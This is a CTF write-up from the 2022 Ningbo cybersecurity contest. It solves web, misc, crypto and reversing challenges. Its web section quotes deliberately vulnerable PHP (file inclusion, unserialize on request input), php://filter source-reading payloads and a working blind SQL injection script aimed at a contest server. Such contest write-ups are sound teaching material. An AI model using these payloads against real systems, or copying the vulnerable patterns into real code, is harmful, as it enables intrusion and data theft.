2022宁波市第五届网络安全大赛
date
May 15, 2022
slug
csc-ningbo-ctf-2022
status
Published
tags
CTF
WriteUP
summary
type
Post
总排名:2
院校组排名:1
Web
OneTwoThree
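<?php
// CTF challenge source as served (highlight_file() below prints it to the
// visitor). Everything the branch below acts on comes from the request.
highlight_file(__FILE__);
error_reporting(0);
include("ans.php");
if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
    // None of the three values is validated before use.
    $one = $_GET["one"];
    $two = $_GET["two"];
    echo "111";
    $three = $_POST["three"];
    if(!empty($one) && !empty($two) && !empty($three))
    {
        echo "222";
        // $two is a request-controlled path/stream given to file_get_contents(),
        // so whatever it resolves to is read and echoed back to the client.
        echo file_get_contents($two);
        if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) === "onTh1s")
        {
            var_dump($one);
            // Request-controlled include(): a file-inclusion sink. With a
            // php://filter wrapper the target's source is returned encoded
            // rather than executed, which is how the writeup reads ans.php.
            include($one);
        }
    }
    else
        die("Insufficient Parameters");
}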
此处就是要构造一个one two three
one就是文件位置 two和three就对应文件内容
然后找flag
one=php://filter/convert.base64-encode/resource=ans.php
Lesen
<?php
// CTF challenge source as served (highlight_file() below prints it).
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
// Deny-list on the include path, with a loose comparison: stripos() returns
// FALSE when "flag" is absent and an int offset when present, and with `!=`
// (not `!==`) an offset of 0 compares equal to FALSE, so a value that starts
// with "flag" is not reset here. The check also says nothing about stream
// wrappers such as php://filter, which the writeup uses on behind.php.
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
    $from = "behind.php";
}
include($from);// read flag.php -- request-controlled include (file-inclusion sink)
// unserialize() on raw request input is an object-injection sink; the classes
// available here are whatever the include above defined, which the payload
// built in the writeup relies on.
if(isset($to))
{
    $a = unserialize($to);
    $a->sayTheFlag();
}
include了一个from 先读behind.php
php://filter/convert.base64-encode/resource=behind.php&to=
解base64 构造php反序列化
最后打反序列化就行了
ScoreQuery
SQL注入
先尝试注入点
id=0'//or//1%23
有注入点 布尔盲注
然后过滤了挺多 还没limit
import requests
import string
# Candidate characters tried at every position of the blind-injection oracle.
s = string.printable
flag = ''
# Boolean-based blind SQL injection oracle against the injection point found
# above. The two `{}` slots take the 1-based substring offset and the candidate
# character; a true condition is recognised by the fixed response length 2263.
URL_TEMPLATE = "http://119.61.19.217:55012/?id=0'/**/or/**/substr(binary(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{},1)='{}'%23"
TRUE_RESPONSE_LENGTH = 2263
for pos in range(1, 45):
    for ch in s:
        resp = requests.get(URL_TEMPLATE.format(pos, ch))
        if len(resp.text) != TRUE_RESPONSE_LENGTH:
            continue
        # First character that satisfies the oracle is taken for this position.
        print(ch)
        flag = flag + ch
        break
表名出来后就方便多了 TheFl4g
Misc
BlackAndWhite
打开都是黑黑白白的图片 直接写脚本提取0 和1
import hashlib, os
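# md5 of the frame that encodes a "0" bit; every other frame counts as "1".
ZERO_MD5 = "fc83ab4f43d9ba8b952344397db45884"


def image_bit(blob, zero_md5=ZERO_MD5):
    """Map one image's raw bytes to the bit it encodes.

    Args:
        blob: the file's bytes.
        zero_md5: hex md5 digest of the frame that stands for "0".

    Returns:
        "0" when md5(blob) equals ``zero_md5``, otherwise "1". The digest is
        printed as well, as the original script did for every frame.
    """
    digest = hashlib.md5(blob).hexdigest()
    print(digest)
    return "0" if digest == zero_md5 else "1"


def read_bits(dirpath, count=335, zero_md5=ZERO_MD5):
    """Concatenate the bits of ``<dirpath>/0.png`` .. ``<dirpath>/<count-1>.png``.

    Args:
        dirpath: directory holding the numbered PNG frames.
        count: number of frames to read, in order (335 in the challenge).
        zero_md5: see ``image_bit``.

    Returns:
        The bit string, one character per frame.

    Raises:
        OSError: if a frame is missing or unreadable.
    """
    bits = []
    for i in range(count):
        # Files are closed per frame; the original left every handle open.
        with open(os.path.join(dirpath, f"{i}.png"), "rb") as fd:
            bits.append(image_bit(fd.read(), zero_md5))
    return "".join(bits)


if __name__ == "__main__":
    print(read_bits(r"C:\Users\32253\Downloads\target\target"))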
01100110011011000110000101100111011110110110001001100001011000010110011000110000001100010011001101100100001011010110011000110011011001100110000100101101011000100110001101100010011001010010110100110000001100000110011001100010001011010011000101100101001100010110000100110011001101000110001001100010001100100110000101100110001100010111110
直接转个字符就完事
Analyze
这题binwalk分离出压缩包
然后压缩包里password.txt 根据文章内的base64
生成一个压缩包
明文攻击
然后得到图片 lsb就行
DocDocDoc
改压缩包后 两张图片
直接拉长
rot完事
Digital_plate
打开流量包发现报错
文件隐写
题目名字就知道是数位板
tshark -r Digital_plate.pcapng -T fields -e usbhid.data | sed '/^\s*$/d' > out.txt
前三位为固定数值 088,后八位也为固定数值 00000000
第四位 0 和 1 代表的就是数位笔是否在数位板上画画 数据小端序
解密脚本:
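def parse_pen_points(records):
    """Turn tshark ``usbhid.data`` hex records into plot coordinates.

    Field layout as the writeup describes it: character 3 is the pen-down
    flag ('1' while the pen is drawing), characters 4-7 are the x coordinate
    and 8-11 the y coordinate, both 16-bit little-endian.

    Args:
        records: iterable of hex strings, one record each; a trailing
            newline is tolerated.

    Yields:
        ``(x, -y)`` for every pen-down record (y is negated, presumably so
        the gnuplot picture is not mirrored). Records shorter than 12
        characters are skipped instead of raising IndexError.
    """
    for rec in records:
        rec = rec.strip('\n')
        if len(rec) < 12 or rec[3] != '1':
            continue
        x = int(rec[4:6], 16) + int(rec[6:8], 16) * 256
        y = int(rec[8:10], 16) + int(rec[10:12], 16) * 256
        yield x, -y


def write_pen_points(src='out.txt', dst='result.txt'):
    """Read ``src`` and write one ``"x y"`` pair per line to ``dst``.

    Both files are closed on exit; the original left the input open.
    """
    with open(src) as f, open(dst, 'w') as fi:
        for x, y in parse_pen_points(f):
            fi.write(f"{x} {y}\n")


if __name__ == "__main__":
    write_pen_points()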
gnuplot 画图
key: kaseyd4wi2v3sc518dc84bsa4a9
得到一张
silenteye 隐写,但是失败了
猜测是压感
第四位为 1,数位板滑动时,代表 y 轴的 9-12 位数据,后面还会出现 13-16 位
这四位数据,这个数据代表的就是数位笔在数位板上的压感,
提取数据
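def parse_light_pen_points(records):
    """Like the first extraction, but keep only low-pressure pen-down records.

    Field layout as the writeup describes it: character 3 is the pen-down
    flag, characters 4-7 / 8-11 are the little-endian x / y coordinates and
    characters 12-15 carry the pen pressure. A record is kept only when its
    leading pressure digit is below 0xF, which is the writeup's way of
    isolating the strokes that draw the key.

    Args:
        records: iterable of hex strings, one record each; a trailing
            newline is tolerated.

    Yields:
        ``(x, -y)`` for every record that passes both checks. Records
        shorter than 13 characters are skipped instead of raising IndexError.

    Raises:
        ValueError: if character 12 of a pen-down record is not a hex digit.
    """
    for rec in records:
        rec = rec.strip('\n')
        if len(rec) < 13 or rec[3] != '1' or int(rec[12], 16) >= 15:
            continue
        x = int(rec[4:6], 16) + int(rec[6:8], 16) * 256
        y = int(rec[8:10], 16) + int(rec[10:12], 16) * 256
        yield x, -y


def write_light_pen_points(src='out.txt', dst='result.txt'):
    """Read ``src`` and write one ``"x y"`` pair per line to ``dst``.

    Both files are closed on exit; the original left the input open.
    """
    with open(src) as f, open(dst, 'w') as fi:
        for x, y in parse_light_pen_points(f):
            fi.write(f"{x} {y}\n")


if __name__ == "__main__":
    write_light_pen_points()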
画图得到key
18cba496 作为 key, silenteye 隐写解密,SilentEy
Crypto
Cr4ck2
共模攻击
工具一把梭
CrackCi4er
import math

from Crypto.Util.number import *
from gmpy2 import *
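n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614


def _int_to_bytes(value):
    """Big-endian bytes of a non-negative int; 0 becomes b"\\x00" like long_to_bytes()."""
    return value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")


def shared_prime_attack(n1, e1, c1, n2, e2, c2):
    """Decrypt two RSA ciphertexts whose moduli share one prime factor.

    The writeup files this under "common modulus", but what the script does
    is the shared-prime case: ``gcd(n1, n2)`` recovers the common prime p,
    each modulus is split as p * q, and the private exponent is rebuilt from
    phi(n) = (p - 1)(q - 1). Only the standard library is needed.

    Args:
        n1, e1, c1: first modulus, public exponent and ciphertext (ints).
        n2, e2, c2: second modulus, public exponent and ciphertext (ints).

    Returns:
        ``(m1, m2)``: the two plaintexts as big-endian byte strings.

    Raises:
        ValueError: if the moduli share no factor, or one modulus divides
            the other (so no single prime can be split off), or an exponent
            is not invertible modulo its phi(n).
    """
    p = math.gcd(n1, n2)
    if p == 1 or p in (n1, n2):
        raise ValueError("moduli do not share exactly one prime factor")
    q1, q2 = n1 // p, n2 // p
    # pow(e, -1, m) raises ValueError when e and phi are not coprime.
    d1 = pow(e1, -1, (p - 1) * (q1 - 1))
    d2 = pow(e2, -1, (p - 1) * (q2 - 1))
    return _int_to_bytes(pow(c1, d1, n1)), _int_to_bytes(pow(c2, d2, n2))


if __name__ == "__main__":
    # Same output as the original script: both cofactors, then both plaintexts.
    shared = math.gcd(n1, n2)
    print(n1 // shared)
    print(n2 // shared)
    for plaintext in shared_prime_attack(n1, e1, c1, n2, e2, c2):
        print(plaintext)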
Reverse
go2cry
8位一组加密,共计4组
part 1
简单单字节操作
循环结构如下
for i in range(0, 4, 3)
而后调用
math_big___ptr_Int__SetInt64
转为int64
math_big_nat_setBytes
转为big-endian
part 2
而后进入异或循环,v14有符号,通过判断符号正负确定是否异或
part 3
最后进入位操作,看起来很复杂,实际上只是将每个字节按照位序拼接
化简运算之后
# Bytes of 0x60DEA84CFE06B24C, least-significant byte first.
revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]
# Stage 3 of the cipher, simplified: rotate each byte left by 5, then
# transpose the resulting 8x8 bit matrix (bit 7-k of rotated byte m becomes
# bit 7-m of output byte k).
rolled = [ROL(v, 5, 8) for v in revs]
enc = [0] * 8
for k in range(8):
    for m in range(8):
        bit = (rolled[m] >> (7 - k)) & 1
        enc[k] |= (bit * 0x80) >> m
print([format(v, "08b") for v in rolled])
print([format(v, "08b") for v in enc])
# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']
完整脚本如下
# -*- coding:utf-8 -*-
"""
@Author: Mas0n
@File: t2.py
@Time: 2022/5/15 11:03
@Desc: It's all about getting better.
"""
from z3 import *
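def ROL(data, shift, size=32):
    """Rotate ``data`` left by ``shift`` bits inside a ``size``-bit word.

    Args:
        data: integer to rotate; only its low ``size`` bits are meaningful.
        shift: rotation amount, reduced modulo ``size`` (so ``shift == size``
            is the identity).
        size: word width in bits; 32 by default, 8 where the solver uses it.

    Returns:
        The rotated value masked to ``size`` bits, so an input wider than the
        word can no longer leak stray high bits into the result.
    """
    shift %= size
    mask = (1 << size) - 1
    return ((data << shift) | (data >> (size - shift))) & mask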
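def ROR(data, shift, size=32):
    """Rotate ``data`` right by ``shift`` bits inside a ``size``-bit word.

    Args:
        data: integer to rotate; only its low ``size`` bits are meaningful.
        shift: rotation amount, reduced modulo ``size`` (so ``shift == size``
            is the identity).
        size: word width in bits; 32 by default, 8 where the solver uses it.

    Returns:
        The rotated value masked to ``size`` bits, so an input wider than the
        word can no longer leak stray high bits into the result.
    """
    shift %= size
    mask = (1 << size) - 1
    return ((data >> shift) | (data << (size - shift))) & mask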
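def solves(res):
    """Recover one 8-byte plaintext group from its 8 encrypted bytes with z3.

    Models the three stages the writeup identifies -- byte-triple mixing,
    64 rounds of shift-and-conditional-XOR, and the bit transposition /
    rotation -- over symbolic input bytes, and asks the solver for the input.

    Args:
        res: sequence of exactly 8 ints in 0..255, the expected output group.

    Returns:
        bytearray of the 8 recovered input bytes; also printed, as before.

    Raises:
        ValueError: if ``res`` is not 8 bytes long, or no input satisfies
            the constraints (previously an ``assert``, which ``python -O``
            would have skipped).
    """
    if len(res) != 8:
        raise ValueError(f"expected an 8-byte group, got {len(res)} bytes")
    sol = Solver()
    raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
    inp = list(raw)
    # Stage 1: range(0, 4, 3) yields only 0 and 3, so two triples (bytes 0-2
    # and 3-5) are mixed; bytes 6 and 7 pass through untouched.
    for i in range(0, 4, 3):
        v20 = inp[i] ^ inp[i + 2]
        inp[i] = v20
        v19 = v20 ^ inp[i + 2] ^ inp[i + 1]
        inp[i + 1] = v19
        inp[i + 2] ^= v19
    # Stage 2: 64 rounds on the 64-bit word; each round doubles it and XORs
    # the constant when the top bit was set. `& 1` keeps only that bit,
    # whether the solver's `>>` sign-extends or not.
    v14 = Concat(*inp)
    for _ in range(64):
        v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)
    # Split the word back into bytes, least-significant byte first.
    inp3 = [Extract(8 * k + 7, 8 * k, v14) for k in range(8)]
    # Stage 3 inverted on the expected output: transpose the 8x8 bit matrix
    # of `res`, then rotate each byte right by 5.
    temp = []
    for i in range(8):
        ch = 0
        for j in range(8):
            ch = (ch << 1) | ((res[j] >> (7 - i)) & 1)
        temp.append(ROR(ch, 5, 8))
    for lhs, rhs in zip(inp3, temp):
        sol.add(lhs == rhs)
    if sol.check() != sat:
        raise ValueError("no input satisfies the constraints for this group")
    mol = sol.model()
    out = bytearray(mol.eval(b).as_long() for b in raw)
    print(out)
    return out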
# The 32 compared bytes: four encrypted groups of eight, as the writeup notes.
cmpdata = [0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08, 0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19, 0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF, 0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58]
# Each group is independent, so solve them one at a time, in order.
groups = [cmpdata[off:off + 8] for off in range(0, len(cmpdata), 8)]
for group in groups:
    solves(group)
andlua
明文lua
改了解释器
这里看到check
分析下vm的执行
看到操作关键数组
简单字节操作
逆循环即可
# -*- coding:utf-8 -*-
"""
@Author: Mas0n
@File: t3.py
@Time: 2022/5/15 13:34
@Desc: It's all about getting better.
"""
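# Trace of the checker's writes to input_byte as dumped from the modified
# interpreter: five operations are recorded per byte, in the order applied.
data = """input_byte[0] = 23
input_byte[0] = 5
input_byte[0] = 33
input_byte[0] = 11
input_byte[0] = 14
input_byte[1] = 10
input_byte[1] = 21
input_byte[1] = 7
input_byte[1] = 40
input_byte[1] = 12
input_byte[2] = 32
input_byte[2] = 32
input_byte[2] = 35
input_byte[2] = 13
input_byte[2] = 14
input_byte[3] = 26
input_byte[3] = 7
input_byte[3] = 25
input_byte[3] = 25
input_byte[3] = 1
input_byte[4] = 3
input_byte[4] = 4
input_byte[4] = 13
input_byte[4] = 27
input_byte[4] = 5
input_byte[5] = 25
input_byte[5] = 13
input_byte[5] = 1
input_byte[5] = 33
input_byte[5] = 38
input_byte[6] = 33
input_byte[6] = 24
input_byte[6] = 31
input_byte[6] = 17
input_byte[6] = 24
input_byte[7] = 20
input_byte[7] = 26
input_byte[7] = 8
input_byte[7] = 20
input_byte[7] = 40
input_byte[8] = 25
input_byte[8] = 18
input_byte[8] = 3
input_byte[8] = 7
input_byte[8] = 34
input_byte[9] = 26
input_byte[9] = 37
input_byte[9] = 8
input_byte[9] = 15
input_byte[9] = 28
input_byte[10] = 31
input_byte[10] = 21
input_byte[10] = 31
input_byte[10] = 19
input_byte[10] = 21
input_byte[11] = 19
input_byte[11] = 3
input_byte[11] = 37
input_byte[11] = 13
input_byte[11] = 20
input_byte[12] = 18
input_byte[12] = 12
input_byte[12] = 15
input_byte[12] = 3
input_byte[12] = 4
input_byte[13] = 33
input_byte[13] = 21
input_byte[13] = 33
input_byte[13] = 7
input_byte[13] = 18
input_byte[14] = 15
input_byte[14] = 23
input_byte[14] = 3
input_byte[14] = 12
input_byte[14] = 40
input_byte[15] = 11
input_byte[15] = 32
input_byte[15] = 25
input_byte[15] = 34
input_byte[15] = 36
input_byte[16] = 9
input_byte[16] = 9
input_byte[16] = 37
input_byte[16] = 19
input_byte[16] = 27
input_byte[17] = 36
input_byte[17] = 10
input_byte[17] = 30
input_byte[17] = 14
input_byte[17] = 14
input_byte[18] = 10
input_byte[18] = 34
input_byte[18] = 6
input_byte[18] = 31
input_byte[18] = 27
input_byte[19] = 11
input_byte[19] = 9
input_byte[19] = 29
input_byte[19] = 40
input_byte[19] = 5
input_byte[20] = 20
input_byte[20] = 35
input_byte[20] = 26
input_byte[20] = 29
input_byte[20] = 21
input_byte[21] = 31
input_byte[21] = 19
input_byte[21] = 8
input_byte[21] = 1
input_byte[21] = 4
input_byte[22] = 37
input_byte[22] = 39
input_byte[22] = 25
input_byte[22] = 12
input_byte[22] = 20
input_byte[23] = 17
input_byte[23] = 24
input_byte[23] = 19
input_byte[23] = 1
input_byte[23] = 9
input_byte[24] = 19
input_byte[24] = 18
input_byte[24] = 11
input_byte[24] = 28
input_byte[24] = 21
input_byte[25] = 7
input_byte[25] = 6
input_byte[25] = 6
input_byte[25] = 31
input_byte[25] = 8
input_byte[26] = 9
input_byte[26] = 22
input_byte[26] = 13
input_byte[26] = 14
input_byte[26] = 30
input_byte[27] = 7
input_byte[27] = 19
input_byte[27] = 34
input_byte[27] = 3
input_byte[27] = 9
input_byte[28] = 39
input_byte[28] = 16
input_byte[28] = 28
input_byte[28] = 15
input_byte[28] = 15
input_byte[29] = 26
input_byte[29] = 19
input_byte[29] = 11
input_byte[29] = 15
input_byte[29] = 27
input_byte[30] = 29
input_byte[30] = 32
input_byte[30] = 11
input_byte[30] = 26
input_byte[30] = 33
input_byte[31] = 13
input_byte[31] = 10
input_byte[31] = 11
input_byte[31] = 8
input_byte[31] = 12
input_byte[32] = 14
input_byte[32] = 21
input_byte[32] = 13
input_byte[32] = 9
input_byte[32] = 13
input_byte[33] = 21
input_byte[33] = 9
input_byte[33] = 24
input_byte[33] = 27
input_byte[33] = 23
input_byte[34] = 10
input_byte[34] = 7
input_byte[34] = 24
input_byte[34] = 8
input_byte[34] = 39
input_byte[35] = 8
input_byte[35] = 30
input_byte[35] = 21
input_byte[35] = 37
input_byte[35] = 20
input_byte[36] = 30
input_byte[36] = 26
input_byte[36] = 2
input_byte[36] = 17
input_byte[36] = 29
input_byte[37] = 22
input_byte[37] = 8
input_byte[37] = 31
input_byte[37] = 16
input_byte[37] = 8
"""
# The 38 bytes the checker compares the transformed input against.
cmpdata = bytearray([0x00000066, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0, 0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070, 0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049, 0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067, 0x0000005D, 0x00000084])

# Operations recorded per input byte in the dump above.
OPS_PER_BYTE = 5


def _parse_operands(dump):
    """Return the operand N of every `input_byte[i] = N` line as a list of ints."""
    return [int(line.split("= ")[1]) for line in dump.splitlines()]


OPCode = _parse_operands(data)

# The original indexed cmpdata blindly; a mismatched dump would either raise
# IndexError part-way through or leave trailing bytes untouched silently.
if len(OPCode) != OPS_PER_BYTE * len(cmpdata):
    raise ValueError(
        f"expected {OPS_PER_BYTE * len(cmpdata)} operations for "
        f"{len(cmpdata)} bytes, got {len(OPCode)}"
    )

# Undo the checker's five operations per byte in reverse order (the writeup's
# "reverse the loop"): operands above 19 are XORs (self-inverse), 10..19 are
# undone by subtracting, and 0..9 by adding. bytearray item assignment raises
# ValueError if a step leaves the 0..255 range, which a correct dump never does.
for idx, start in enumerate(range(0, len(OPCode), OPS_PER_BYTE)):
    for op in reversed(OPCode[start:start + OPS_PER_BYTE]):
        if op > 19:
            cmpdata[idx] ^= op
        elif op > 9:
            cmpdata[idx] -= op
        else:
            cmpdata[idx] += op
print(cmpdata)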